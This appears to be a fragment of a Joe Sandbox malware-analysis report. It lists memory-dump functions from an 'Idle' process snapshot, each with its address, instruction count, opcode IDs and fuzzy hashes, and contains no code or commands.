                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 25b69831f47de4529ac36faa722feb5ea1d2bf22742c9b3070f9e38f95e166c1
                                                                                              • Instruction ID: 4cb63f9e0a41b073035b84353f2577c6cb61ecf8d60f5f6296fcdeabb714568f
                                                                                              • Opcode Fuzzy Hash: 25b69831f47de4529ac36faa722feb5ea1d2bf22742c9b3070f9e38f95e166c1
                                                                                              • Instruction Fuzzy Hash: 9041B330A0A64D8FEB64EB6488687FDB7B1FF05310F0101BAD44DD21A2DFB86A44DB55
                                                                                              Function 00007FFD9BA926AD Relevance: .1, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4dd264be6e34fbafc7563012677895b94c396f845686fe67a79c820aa79dbb7b
                                                                                              • Instruction ID: f20de42834a9a526996c052c01855516339d0783dcef1c5a08b655e6237e4abc
                                                                                              • Opcode Fuzzy Hash: 4dd264be6e34fbafc7563012677895b94c396f845686fe67a79c820aa79dbb7b
                                                                                              • Instruction Fuzzy Hash: 2D31A43091E3CE8FDB6A9F7488685A57FB0FF06204F0544FBD458C60A2DB78A558DB41
                                                                                              Function 00007FFD9BA90500 Relevance: .1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 400659eb4cffee6d7833ca6d99d9d0b5f3ccc5b5424322344e4bae9c38474679
                                                                                              • Instruction ID: 29af866dacd2e56a3e44c844de93ac1b5f7b7650a5e0d446c956eff6bc858ddd
                                                                                              • Opcode Fuzzy Hash: 400659eb4cffee6d7833ca6d99d9d0b5f3ccc5b5424322344e4bae9c38474679
                                                                                              • Instruction Fuzzy Hash: 7B41A430A1E78E8FDB69EFA488685E93BF0FF05304F4544BAD418C70A2DA78E654DB41
                                                                                              Function 00007FFD9BA9A880 Relevance: .1, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1fc9d59c99f3b4634eb0e842b571a8c0f2407e070cc4f302c814ec58b4cb836f
                                                                                              • Instruction ID: 83cf1cb6d6af86490dee55c23b639069412db9ca0338df4df0346ecb5434c21e
                                                                                              • Opcode Fuzzy Hash: 1fc9d59c99f3b4634eb0e842b571a8c0f2407e070cc4f302c814ec58b4cb836f
                                                                                              • Instruction Fuzzy Hash: 2C31843090DB8E8FDB95EF68C8686A97BF0FF1A300F0505ABE459C7162DB789654CB41
                                                                                              Function 00007FFD9BA9C008 Relevance: .1, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b602cb17460e50f33fdb2535db0f36e3da9e8baf57763f89d4da79a5986d2d9
                                                                                              • Instruction ID: 8c461899cf1bfddfc44c9af5735da39c42824092eb1641cb07087d1bff3c82ec
                                                                                              • Opcode Fuzzy Hash: 5b602cb17460e50f33fdb2535db0f36e3da9e8baf57763f89d4da79a5986d2d9
                                                                                              • Instruction Fuzzy Hash: C931503050DB8E8FDB95EF68C8696A97BF0FF16300F0505ABE459C7162DB789A44CB41
                                                                                              Function 00007FFD9BAA7BA1 Relevance: .1, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd6e5494cad09c9729e7fed34288e26d43e7825b2d42376053e248c9349e4b2a
                                                                                              • Instruction ID: 5353aa3e66a01d0fbdb9431f87fd5c4260acceafecedc6ecd0a3bfaa40441d51
                                                                                              • Opcode Fuzzy Hash: bd6e5494cad09c9729e7fed34288e26d43e7825b2d42376053e248c9349e4b2a
                                                                                              • Instruction Fuzzy Hash: FC31E771E05A5D8FEBA4EF68C854BA9B7B2FF58341F5041FA900DE3291DE746A818F40
                                                                                              Function 00007FFD9BAA8190 Relevance: .1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dddda64f8a45b878cf79de80f49f5901595807d4a37b87bd633f08cce2ba9754
                                                                                              • Instruction ID: e1f6816157d6918e2c2877598837e2b3acbb0e6a2b2842ee9407648648befdfd
                                                                                              • Opcode Fuzzy Hash: dddda64f8a45b878cf79de80f49f5901595807d4a37b87bd633f08cce2ba9754
                                                                                              • Instruction Fuzzy Hash: 7931E421F0F17E8BE77597E654385BC7690AF05310F1645B6D82DC60F6DC9C6A809F42
                                                                                              Function 00007FFD9BAA43D8 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f8f3b42c9bf6e84f703633b137120c53737c601c56540d3a12ee0750c9c19c1c
                                                                                              • Instruction ID: e768ee91d5e9e6b10b03922918aaf0c5f0351b10143db04a2fc4bc9a9bc00ea5
                                                                                              • Opcode Fuzzy Hash: f8f3b42c9bf6e84f703633b137120c53737c601c56540d3a12ee0750c9c19c1c
                                                                                              • Instruction Fuzzy Hash: 4431F471A0E68E8BEBA89F6488352F93AD1FF15300F0101BEF85CC61B2DE7866548751
                                                                                              Function 00007FFD9BAB7948 Relevance: .1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f10a966d04d1190c78673694e5b138d2da68919167284aaee7849eb67a34b920
                                                                                              • Instruction ID: c3f2fc01ac139c2ca0721a89160a6fd8ba677ae7db41d081e22b3c98822971b4
                                                                                              • Opcode Fuzzy Hash: f10a966d04d1190c78673694e5b138d2da68919167284aaee7849eb67a34b920
                                                                                              • Instruction Fuzzy Hash: 6C31FA30A1E96E8AFBACDB9484A15BD76B1FF44304F51007AD06ED21A1DEB97A409F41
                                                                                              Function 00007FFD9BA904F8 Relevance: .1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 488b8a4659de5bc276153662a94bcce6a4a4bd0f8391163b4e93ede9c1e403f6
                                                                                              • Instruction ID: f972abb048bca75962b9e870993d4f901074b10691a3673763ccae8925108fe1
                                                                                              • Opcode Fuzzy Hash: 488b8a4659de5bc276153662a94bcce6a4a4bd0f8391163b4e93ede9c1e403f6
                                                                                              • Instruction Fuzzy Hash: E431B130A1964E8FEB59EBA8C4686B97BE0FF19304F0144BAD419D71A5DB74A644CB01
                                                                                              Function 00007FFD9BAA6E38 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c9f99b02fd4f01c103528fcac9d495640288e24e9bc63efb18e532d547663c1
                                                                                              • Instruction ID: d3310a5ff64854e4157411c7147ed5410304121d5a6b3f0dd05f4fa61d4655ab
                                                                                              • Opcode Fuzzy Hash: 9c9f99b02fd4f01c103528fcac9d495640288e24e9bc63efb18e532d547663c1
                                                                                              • Instruction Fuzzy Hash: D821CE34A0F64E8FEB759BA8C8342FD76A1EF05310F05417AD419961E1EEB8A6488F61
                                                                                              Function 00007FFD9BA9C72D Relevance: .1, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b1c08f73ee306fd0b730099533b0f9416d8def7b5070a29e64d7dd39a76cf538
                                                                                              • Instruction ID: e2280a38ea009af7cd1e242560fe29c89d29236bee7e6689bb40828b16644578
                                                                                              • Opcode Fuzzy Hash: b1c08f73ee306fd0b730099533b0f9416d8def7b5070a29e64d7dd39a76cf538
                                                                                              • Instruction Fuzzy Hash: DA210432A0DA1E8FDB68EF9CE8616FE77A1FF58324F00013BE509D6191DE2865458794
                                                                                              Function 00007FFD9BAA0728 Relevance: .1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e168eec20259ab4a70dfec93afa3c36ac7b3b15c3dee1cae7c394b8ded3f422b
                                                                                              • Instruction ID: ac8c9b96e8efbfd6112784cfa0687e009fbbbc787cb160a2d6d349a4b2e68837
                                                                                              • Opcode Fuzzy Hash: e168eec20259ab4a70dfec93afa3c36ac7b3b15c3dee1cae7c394b8ded3f422b
                                                                                              • Instruction Fuzzy Hash: 1931A030A0EA8E8FEBB49B64C8246F97BB1FF15700F01057AD40DC71A2DBB86A44CB45
                                                                                              Function 00007FFD9BA9C730 Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 119931eb0c1259e4734dd06fe591e1c8e35f4b8269fc672a4420082b422f12bf
                                                                                              • Instruction ID: b3557ed14ad8aae295a0230a07de60d0a1284b7e43dbbfcb5437b4248440c37d
                                                                                              • Opcode Fuzzy Hash: 119931eb0c1259e4734dd06fe591e1c8e35f4b8269fc672a4420082b422f12bf
                                                                                              • Instruction Fuzzy Hash: FE210432A0961E8BDB68EF9CE8616FE77A1FF58324F00023BE409D6192DE2425458794
                                                                                              Function 00007FFD9BAA7FFE Relevance: .1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 12dbf5d14091f15e221da67c85e03e0f042bcbc39e0e2c183e5b798f5396b545
                                                                                              • Instruction ID: 75bf246f9a1bf62ca19f8ece2a534377267c8f9cff4ef6374b76a6c7c3a3ac82
                                                                                              • Opcode Fuzzy Hash: 12dbf5d14091f15e221da67c85e03e0f042bcbc39e0e2c183e5b798f5396b545
                                                                                              • Instruction Fuzzy Hash: 20214F71E09A2D8FEFA0DF888850BE973B5FB24311F4141A6D05DE3290DA706A868F91
                                                                                              Function 00007FFD9BA9334B Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 629ec451de11f2851ce4666744d97401732104ce030bdfe5f9caf0e8f3530f8b
                                                                                              • Instruction ID: c608b6e1244e71db9d194e1eea6e7cf20534f3fc8b03e2c739fe9d7ac108ea34
                                                                                              • Opcode Fuzzy Hash: 629ec451de11f2851ce4666744d97401732104ce030bdfe5f9caf0e8f3530f8b
                                                                                              • Instruction Fuzzy Hash: C021F771E0961D8FEB68EB98C4A4AECBBF1EF58301F11417AD009E72A5CA786940DB00
                                                                                              Function 00007FFD9BA9C738 Relevance: .1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 762965e39fc79b66337ed37250bde246058414e3ed79f969de768f819049a022
                                                                                              • Instruction ID: 73c497058fa0259c84bfad36a475d15353728367e76f3bb8002fb5bf86844fd1
                                                                                              • Opcode Fuzzy Hash: 762965e39fc79b66337ed37250bde246058414e3ed79f969de768f819049a022
                                                                                              • Instruction Fuzzy Hash: 8D210532A0D91E4FDB68EF9CE8616FE77A1FF58324F00013BE40DD6196DE2825448794
                                                                                              Function 00007FFD9BA92F28 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b3d63f685644802514d16ed4355da667baf6349c21f9c014199121848227493
                                                                                              • Instruction ID: bedf1d2317c341c764e8a2dbf91de77a348ec1b365582e716de563da6264cdd4
                                                                                              • Opcode Fuzzy Hash: 2b3d63f685644802514d16ed4355da667baf6349c21f9c014199121848227493
                                                                                              • Instruction Fuzzy Hash: F321E271E0E74E8EE725ABE488297BAB7E0AF05310F010576D408D61E1EAB8A758D781
                                                                                              Function 00007FFD9BA9C350 Relevance: .1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b67030892c56c780e042f6d1ef4a4dc27f3d54d5052195776098c98128c07c1d
                                                                                              • Instruction ID: 808bd50b1c9e74c8d3d357d962e81ed931a7cd9e5c428623a2e4fc57eb3249a0
                                                                                              • Opcode Fuzzy Hash: b67030892c56c780e042f6d1ef4a4dc27f3d54d5052195776098c98128c07c1d
                                                                                              • Instruction Fuzzy Hash: 0C219D30A0E7CA8FD756AB6488791F97FB0EF16314B0A05EBD449CB0E3DA6C5944C751
                                                                                              Function 00007FFD9BA90A01 Relevance: .1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e91d964a42a1b4389f2f41f0cb1110a2d2e7aaae877b59f2c6c61c67a0204d2
                                                                                              • Instruction ID: 96a6ea131ae98720059bf3f11b16b6fa64bd873fd11062c0823bbbdcda5ad675
                                                                                              • Opcode Fuzzy Hash: 3e91d964a42a1b4389f2f41f0cb1110a2d2e7aaae877b59f2c6c61c67a0204d2
                                                                                              • Instruction Fuzzy Hash: E811C171E0950E4FEBA4EBA888A95FD7BE0FF58740F4245B6D41CC70B6EE78A6409740
                                                                                              Function 00007FFD9BAA2ED3 Relevance: .1, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7676f24ae5d98e2b5f176c3915ed81e83fa460b0a530b11facd1eccf39ba5a1f
                                                                                              • Instruction ID: 0a10309213baa3bad5a2b45cf702e9ada854c3b9c6e7e8b9003aabc523c38e93
                                                                                              • Opcode Fuzzy Hash: 7676f24ae5d98e2b5f176c3915ed81e83fa460b0a530b11facd1eccf39ba5a1f
                                                                                              • Instruction Fuzzy Hash: 7B213721A0E78E4FE761ABB488691A97BF0FF25300F0940F6D45CC70A3DE64A618C311
                                                                                              Function 00007FFD9BA988F3 Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a1b31ab0cb5a610e57167fa06f9148515b15c59087361f625a83e70faf90531b
                                                                                              • Instruction ID: 832756c1ecf6cc2716422afd9f2ede0941a7e3b456c82aacf04b634ec4fb3a03
                                                                                              • Opcode Fuzzy Hash: a1b31ab0cb5a610e57167fa06f9148515b15c59087361f625a83e70faf90531b
                                                                                              • Instruction Fuzzy Hash: B8216470E1962D8FDBB9DB58D850BACB7B8FB58750F1185E9A01EE3250DA706B809F00
                                                                                              Function 00007FFD9BA91FF9 Relevance: .1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1c0d5e880f1327f57c5949cd945eac2da357a7116f439f8ae4ea269a3f29549a
                                                                                              • Instruction ID: 452d553cb617809b8e23f6b860a032636c81844bc297e365f34e9f862941808a
                                                                                              • Opcode Fuzzy Hash: 1c0d5e880f1327f57c5949cd945eac2da357a7116f439f8ae4ea269a3f29549a
                                                                                              • Instruction Fuzzy Hash: E8119E0190F3CA6EEB775BB808740616F904F13224B1E46FFD0D88B0F3D8485A4AD302
                                                                                              Function 00007FFD9BA90F72 Relevance: .1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9ac7b17ba234376db067f7c95e83bea3b977e8e4f4ca44da0ac483e79dc42d9b
                                                                                              • Instruction ID: 5295ed2de511478a68d0e58ee74391cbac6bd6f7aed628d38a38ebf998187c05
                                                                                              • Opcode Fuzzy Hash: 9ac7b17ba234376db067f7c95e83bea3b977e8e4f4ca44da0ac483e79dc42d9b
                                                                                              • Instruction Fuzzy Hash: 9A11B130E0591D8BEB68EB58C860BE9B3A1FF54300F5182B9D00DE71A5CE746E459B84
                                                                                              Function 00007FFD9BA92739 Relevance: .1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7499474de8ab55bb5730832f986e5c489889c28a71ca089a1c6c0dc2e866adbe
                                                                                              • Instruction ID: 88560667e007e23b8b37a94c5b1eadc6765df24eccd29e0ed53d63b3409ec535
                                                                                              • Opcode Fuzzy Hash: 7499474de8ab55bb5730832f986e5c489889c28a71ca089a1c6c0dc2e866adbe
                                                                                              • Instruction Fuzzy Hash: 4511B63091E78E8FDB699F6488682F97BB0FF05304F4505BAE818D60E2DB78E654DB41
                                                                                              Function 00007FFD9BA905D8 Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13a02f0e86258e7c1e81efac97379e9a911187e1f12edb4a664d72298116026d
                                                                                              • Instruction ID: 608e5bde1cae6f4db2c15baa1c92dc6f186db50cb146c1e1964b782d7c9ed91b
                                                                                              • Opcode Fuzzy Hash: 13a02f0e86258e7c1e81efac97379e9a911187e1f12edb4a664d72298116026d
                                                                                              • Instruction Fuzzy Hash: A5113630A0E68E9FDB58EFA0C4649B93BE1FF29304F1144BED419C70E2CA75AA40CB00
                                                                                              Function 00007FFD9BA9C098 Relevance: .1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 03cbe3e421f3e365d0ff990a894d18647e5ea4021a80bf77ed3b5c196d9382aa
                                                                                              • Instruction ID: fd771e6739883060d21e652017f2d96b2909718f17a7ccd1c498d23eb5e5e5e7
                                                                                              • Opcode Fuzzy Hash: 03cbe3e421f3e365d0ff990a894d18647e5ea4021a80bf77ed3b5c196d9382aa
                                                                                              • Instruction Fuzzy Hash: 8D11423050EB8E8FDB96DF6888645A93FF0FF16300F0605A7D459C71A2DA789948C741
                                                                                              Function 00007FFD9BA9B1C0 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7395cd8132814c131713fb20223f9c8f713f77e7199f5fad93790e894a3d80b5
                                                                                              • Instruction ID: 8c8a58faf9dddb24dcc420e65449effab1d0c9786c1b0dc6823403dba1513eb9
                                                                                              • Opcode Fuzzy Hash: 7395cd8132814c131713fb20223f9c8f713f77e7199f5fad93790e894a3d80b5
                                                                                              • Instruction Fuzzy Hash: 8E113D70E0551E8FDB64DB94C454BEDB7B1FB58300F5046AAC009E7295CA785A81CB90
                                                                                              Function 00007FFD9BA9C728 Relevance: .1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: de1ffe0a41fadea40414f19c46ff50222dcf83bccfca2b0bb4d5c5ec91132c18
                                                                                              • Instruction ID: f9a2bcbeef2a07fdcb295987be0f78ec89048a927807efbc678eca7c2e41025c
                                                                                              • Opcode Fuzzy Hash: de1ffe0a41fadea40414f19c46ff50222dcf83bccfca2b0bb4d5c5ec91132c18
                                                                                              • Instruction Fuzzy Hash: 42116130A1AA5E8FE751EB68886C6AD7BF1FF19300F0148B6D419C70A5EB34A244DB11
                                                                                              Function 00007FFD9BAA761F Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
